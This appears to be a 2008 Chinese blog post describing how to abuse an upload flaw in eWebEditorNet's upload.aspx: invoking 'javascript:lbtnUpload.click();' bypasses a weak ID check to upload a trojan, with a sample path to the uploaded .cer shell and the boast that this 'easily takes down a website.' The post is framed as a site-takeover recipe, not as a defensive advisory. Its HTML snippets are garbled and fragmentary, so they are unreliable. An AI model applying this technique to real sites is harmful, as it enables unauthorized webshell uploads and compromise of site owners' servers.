eWebEditorNet 主要是一个upload.aspx文件

2008年10月17日星期五 | | |

   
 
 
eWebEditorNet 主要是一个upload.aspx文件存在上传漏洞。

原理:

代码
<form id="post" encType="server">    
"uploadfile" style="file" size="uploadfile" runat=
"lbtnUpload" runat=
"JavaScript">

只是简单的对ID进行验证
只要构造javascript:lbtnUpload.click();满足条件
达到上传木马的效果
成功以后查看源代码

代码
a "lbtnUpload" "javascript:__doPostBack('lbtnUpload','')"</>script 'javascript'</>  

木马的具体地址为
/eWebEditorNet/UploadFile/200801141044412198.cer  这样就轻松的拿下了一个网站。
 
  
   

0 评论:

发表评论

订阅: 博文评论 (Atom)

所有文章收集于网络,如果有牵扯到版权问题请与本站站长联系。谢谢合作![email protected]

 
Glossy Blue by N.Design Studio
Blogger Templates by Blogcrowds | Glossy Blue Blogger Template